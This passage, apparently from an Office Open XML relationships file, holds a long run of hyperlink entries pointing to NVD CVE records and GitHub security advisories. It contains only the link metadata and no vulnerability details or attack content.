Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85425" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85426" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85434" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85435" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85437" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85440" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85602" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85672" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86121" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86190" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-9557-234j-7rv9" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-cw2r-r7mw-j3hc" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66047" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67367" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77635" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82067" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84189" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84197" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85427" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85614" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9317" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-g64v-qqpg-v37h" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-xx34-6cjg-prh8" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17057" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17207" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18664" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19874" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50152" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55511" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62646" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69641" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73309" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73311" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73312" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73475" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75156" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75160" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75431" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75595" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75746" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78327" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78328" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79571" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80181" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81939" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85043" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86729" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86840" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53581" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66768" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69854" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82021" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85982" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-30156" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50093" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5706" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86165" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-rgj7-g3m4-5g8c" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-9049" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12648" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12651" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13761" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14828" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16502" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18198" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18341" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18480" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18851" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19887" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28609" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28618" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28666" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30754" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39944" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49879" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49882" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51974" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52691" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52775" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55521" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62706" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62744" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62895" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65772" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66814" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66818" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66819" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66820" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67368" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67370" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67373" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67380" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67381" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67384" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67385" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67388" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67631" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67638" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67639" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67642" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67643" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68775" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68786" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68828" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69266" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69268" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69273" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69282" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69285" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69291" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69334" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69355" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69360" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69386" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69434" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69439" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69442" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69461" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69464" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69465" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69485" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69494" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69495" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69499" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69511" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69518" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69522" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69529" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69547" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69551" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69556" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69598" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69601" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69603" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69614" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69628" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69629" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69632" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69649" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69669" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69671" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69676" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69678" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69686" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69712" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69716" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69722" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69724" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69729" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69740" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69742" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69759" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69764" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69767" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69772" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69778" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69784" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69797" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69860" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70178" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70203" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70351" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70586" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71328" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71336" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71352" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71963" TargetMode="External" Id="rId335" /><Relationship 